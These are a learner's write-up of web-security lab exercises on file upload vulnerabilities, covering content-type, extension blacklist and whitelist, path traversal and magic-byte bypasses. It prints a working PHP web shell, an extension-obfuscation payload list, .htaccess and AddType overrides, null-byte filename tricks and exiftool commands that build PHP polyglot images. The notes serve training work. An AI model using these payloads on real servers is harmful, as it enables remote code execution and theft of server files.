# File Uploads Vulnerability
###### `burpsuite`
[TOC]
# Impact
The impact of a file upload vulnerability depend on two key of factor.
## Website Validation:
- File Content
- FIle Size
- File Extension
## File Restrictions
- The restriction impose the file, Once the file upload successful.
File uploads vulnerability can lead to various exploitations such as uploading web shells or overwriting the current configuration files.
# Arise
Develop typically will implement the defense in the file upload functionality, However those defense mechanisms may have flawed design that attacker can circumvent .
# Server handle request for files
website typically contain the static file, when user request these files they be parsed or executed and the reuslt is returned through HTTP response.
The structure of static file path usually mapping 1:1 with the file systems, However modern websites are increasingly dynamic and the path of a request often has no direct relationship to the filesystem at all
## Static File Processing
The Server will parse the path to identity the file extension, compares it to a preconfigured mapping between the extension and MIME type.
Considering the configuration in the website:
- If the file type is non-executable, the application typically returns the content in the HTTP response, such as images or HTML.
- IF the file type is executable, but application didn't allow or handle the file executing, it results in the server returning an error message or plain code in the HTTP response.
- If the file is executable (PHP) and application allows execution. the application typically passes the header value or query to variable. the result cand be sent to client in HTTP response.
>Tipe: HTTP response of content-Type can provide the clues to know what kink of file the server think it service.
# Exploiting-Unrestricted file upload to deploy the web shell
IF application allow us upload the server-side Script (PHP, JAVA, PYTHO) and configure it seem as the program and execute it.
> WEB shell it's a malicious script, allowing attack arbitrary execute systems command on target, attacker just pass the commend to webshell endpoint via HTTP query, the webshell will receive the query and execute systems command by program systems call.
General
```
<?php echo system($_GET['command']); ?>
```
## LAB-Remote Code Execution via Upload web Shell
### Mapping target & Recon
### Analysis Attack Surface
#### Parameters
#### Functions
- Login
- Update Email
- Upload Photo
#### Interest things
We can testing upload photo functionality and attempt to upload the web shell.
### Identify
Identify File Upload vulnerability
Application Allow us to upload the php file!!!
We have found a file upload vulnerability.
### Exploit
We can exploit vulnerability to execute arbitrary commands on the target systems !
```php=
<?php echo system($_GET['command']); ?>
```
Retrieve Sensitive Data
```
GET /files/avatars/phpWebShell1.php?command=cat /home/carlos/secret HTTP/2
```
ERKN0M0vTbojLcipnt0RJeYAnVH407eK
Solved!!!
# Exploiting-Flawed validation of Upload
Typically, current website may have defense to prevent upload of script and their execution.
## Flawed File Type Validation
When submitting the HTML form, ebsite typically use application/x-www-from-url-encoding to send text to back-end.
However, it not suitable for sending the binary file, instead we use the `multipart/form-data`.
Each parameter is split to separate part for each input. These individual parts.
Vulnerability Defense:
Some websites use `Content-Type` to check uploaded files. This mechanism allows us to use a proxy to bypass and upload files.
### LAB-WEB shell upload via Content-Type bypass.
#### Mapping the target & Recon
#### Analysis the Attack Surface
Parameters
Functionalities
- Login
- Upload Photo
#### Identify
Evaluated Upload Photo functionality
Upload a Normal Picture:
File be place in `/files/avatars/Cat03.jpg`
Attempt to upload PHP PoC to identify vulnerability. `<?php echo phpinfo(); ?>`
##### Defense mechanism:
According to the response, the website seems to use `Content-Type` to filter malicious files.
PHP in MIME type is seen as `application/octet-stream` (That conversion is done on the client side).
Using a proxy to bypass it: `Content-Type: image/jpeg`
`Content-Type -> text/html` -\> It means PHP code will be placed and parsed in the HTML environment (Server Configuration!!)
There is a file upload vulnerability !!
#### Exploit
Upload web shell to RCE !!
`<?php echo system($_GET['command']); ?>`
Solved !!
## Preventing file execution in use-accessible directors
Some website implement second line defense to prevent the server from running the certain script
-> Content-Type = text/plain
server typically run the file depended on the content-Type
Although it didn't allow us to create web shell. it provide a way to leak the sensitive data or source code.
Note
A directory use for user upload file has typically strict control, If we find the another way to upload the file, it may allow us to run our web shell.
Tips:
In multiple/form-data typically use filename to determine where file should be place
### LAB- WEB shell upload via Path traversal.
#### Mapping the target & Recon
#### Analysis the Attack Surface
Parameters
Functionalities
- Login
- Upload Photo
#### Identify
Evaluated Upload Photo functionality
Upload Normal Picture:
Attempt Upload PHP PoC
Defense mechanism (Optional)
##### Current Directory not allow running Script
We can attempt to escape current directory to upload the file and circumvent Directory control.
According the Result, the server allow use using path traversal to control file upload path
We found a directory is public and not support user to upload file
we can attempt upload the phpPOC there
#### Traversal sequence was stripped!!
Not Found Reason is our '../' be striped on upload functionality
Solve way
- or attempt ...// (fail)
- Obfuscation-URL
Success !!
Combine the path traversal and upload vulnerability we successfully run the php on website!!
#### Exploit
Upload web shell
Solved!!
## Blacklisting bypassing of file type
In some case, we may attempt to bypass the file extension blacking by utilized the less known file type, such as php5, shtml, when we upload the php file
## Override The Server Configuration
As we've learned previously, the server typically restrict execution of the PHP file
Service only execute the file that write on configure file as the following
### apache2.conf
Default Configuration
Path /etc/apache2/apache2.conf
```
LoadModule php_module /usr/lib/apache2/modules/libphp.so
AddType application/x-httpd-php .php
```
/usr/lib/apache2/modules/libphp.so: Dynamic loading of the PHP module File
AddType application/x-httpd-php .php : Instruct the server treat file with .php extension as php Script (MIME = application/x-httpd-php)
### .htaccess (Hide Profile)
Global Configuration in PHP Configure File (.htaccess)
.htaccess is per-directory configuration file that can override the server configuration setting
According this feature, It allow attacker to adding new configuration, When we can fine a way to upload .htaccess file to web application, It may bypass the restriction of file execution on un-trusted directory.
### web.config
For IIS Server (XML File)
```
<staticContent>
<mimeMap fileExtension=".json" mimeType="application/json" />
</staticContent>
```
This xml configuration info the server on how to handle the file with .json file extension
mimeMap -> specific the file type (aplication/json)
If we can arbitrarily upload the malicious configure, we can customer the file extension. Mapping the file extension to executable MIME type to by pass the blacklist.
```
AddType application/x-httpd-php .meowMalisous
```
### Lab-Web shell upload via extension blacklisting bypass
#### Mapping the target & Recon
#### Analysis the Attack Surface
- Parameters
Functionalities
- Update Email
- Upload avator
#### Identify
Upload Avator:
Normal File Upload
Success
Upload .php file (fail)
Defense machnism (Optional)
Identify the Defense Mechanism -> Blacklisting
##### Bypass the blacklisting defense
Alternative PHP extension file
```
phtml
php
php3
php4
php5
inc
pHtml
pHp
pHp3
pHp4
pHp5
iNc
iNc%00
iNc%20%20%20
iNc%20%20%20...%20.%20..
iNc......
inc%00
inc%20%20%20
inc%20%20%20...%20.%20..
inc......
pHp%00
pHp%20%20%20
pHp%20%20%20...%20.%20..
pHp......
pHp3%00
pHp3%20%20%20
pHp3%20%20%20...%20.%20..
pHp3......
pHp4%00
pHp4%20%20%20
pHp4%20%20%20...%20.%20..
pHp4......
pHp5%00
pHp5%20%20%20
pHp5%20%20%20...%20.%20..
pHp5......
pHtml%00
pHtml%20%20%20
pHtml%20%20%20...%20.%20..
pHtml......
php%00
php%20%20%20
php%20%20%20...%20.%20..
php......
php3%00
php3%20%20%20
php3%20%20%20...%20.%20..
php3......
php4%00
php4%20%20%20
php4%20%20%20...%20.%20..
php4......
php5%00
php5%20%20%20
php5%20%20%20...%20.%20..
php5......
phtml%00
phtml%20%20%20
phtml%20%20%20...%20.%20..
phtml......
```
PHP
Upload php3 web shell
Php3
PHP5
Attempting to Upload PHP File (Not Allowed to Execute)
##### Override the Server Configuration
Attempt to Upload .htaccess File (Global)
Modify the Filename and Content-Type
Mapping .meowfile -> PHP Script
```
AddType application/x-httpd-php .meowfile
```
Upload Proof file -> phpinfo.meowfile
PHP arbitrary Execution => flawed file validation & arbitrary file upload & Override server configuration
#### Exploit
Read sensitive file
```
echo file_get_contents("/home/carlos/secret");
```
Solved
## Obfuscation File Extension
If the validation program doesn't recognize "pHp" or "php" as different, it may allow the upload of a PHP file.
### Multiple Extension (White list bypass)
```
exploit.php.jpg
```
Validation: Recognizes as jpg.
Execution: Treated as a PHP file.
Based on the algorithm used.
### Adding trailing characters
Validation: php"space" followed by a space (not identified as a PHP file).
Execution: php followed by a white space (ignored or stripped).
### URL encoding
```
exploit%2Ephp
```
Validation: exploit%2Ephp (not recognized as a PHP file).
Execution (Server Parses URL Encoding): exploit.php
### Adding Null byte or semicolons
```
exploit.asp;.jpg
exploit.asp%00.jpg
```
In C++ implement of Web service with high-level program validation, It may cause different parsing
Validation (PHP/Java): exploit.asp%00.jpg (not in blacklisting)
Execution (C/C++): Parses ;, %00 as the end of the file to strip or ignore the .jsp extension.
### Using Unicode
unicode characters
```
xC0 x2E, xC4 xAE or xC0 xAE
```
### Flawed sanitize
```
exploit.p.phphp
```
### LAB: Web shell Upload via obfuscated file extension
#### Mapping the target & Recon
#### Analysis the Attack Surface
- Parameters
Functionalities
- Update Email
- Upload avator
#### Identify
Avator Upload Functionality:
Normal file: JPG
Attempting upload php file
Defense machnism -> white listing (Only allow jpg)
Attempt obfuscated external up upload file
##### Multiple extension
```
file.png.php
file.png.Php5
```
#### Adding special characters at the end.
```
file.png.php
file.png.pHp5
file.php\x00.png
file.php%OO.png
file.php%0a.png
file.php%0d%0a.png
```
%0a%0d -> newline (URL)
According on fuzzing Result -> the file end have to a png/jpg
%0a%0d not work in file execution
\x00 -> is valid
%00 is valide
According the information we can try
```
file.php%00.png
```
Arbitrary Cmd execution -> allow obfuscated file extension + allow execution php file (default)
#### Exploit
Read sensitive data
Solved !!
## Flawed Validation of file's content
More security service will verify the property of an images such as dimension(Due to pure php script didn't contain the dimension) or sequence of file (FF D8 FF "jpeg" we also call magic Number)
But we can use ExifTool to injected malicious code with its metadata
```
exiftool -Comment="<?php echo 'START ' . phpinfo() . ' END'; ?>" original.jpg -o jpgPropertyContainPHPcode.php
```
Adds your PHP payload to the image's Comment field
And the result will return in the response of binary image data
### LAB-Remote code execution via polyglot web shell upload
#### Mapping the target & Recon
#### Analysis the Attack Surface
##### Parameters
##### Functionalities
- Update Email
- Upload avator
#### Identify
##### File Upload vuln
-> Upload Avator
Normal
Upload Proof concept file
```
phpinfo()
```
Identify Defense machnism (file upload)
We attempt upload valid jpg file extension and we are rejected
we can inference that the server verify the file via file content (dimension or magic byte)
Bypass the validation of file contention
Injected PoC code to metadata via exiftool
```
exiftool -Comment="<?php echo 'START ' . phpinfo() . ' END'; ?>" ./Cat03.jpg -o JPGwithPHPinfo.php
```
RCE !!
#### Exploit
Read Sensitive File
```
exiftool -Comment="<?php echo 'START ' . <?php echo file_get_contents('/home/carlos/secret'); ?> . ' END'; ?>" ./Cat03.jpg -o JPGwithPHPcode.php
```
Solved !!
# Exploiting - file upload race conditions (SKIP)
(skip)
# Exploiting File upload vulnerability without RCE
## Upload Malicious client-side script
Uploading HTML files or SVG images, we can potentially use `<script>` tags to create stored XSS payloads.
## Attempt parsing or process different file formats
Microsoft Office .doc or .xls files, this may be a potential vector for XXE injection attacks.
# Uploading files using PUT
Testing server support methods -> options
```
PUT /images/exploit.php HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-httpd-php
Content-Length: 49
<?php echo phpinfo(); ?>
```
# Prevent the file upload vulnerability (skip)
---
<!--
### LAB-WEB shell upload via Content-Type bypass.
#### Mapping the target & Recon
##### Prameters
##### Functionalities
#### Analysis the Attack Surface
#### Identify
Defense machnism (Optional)
#### Exploit
-->
Sign in with Wallet
Connect another wallet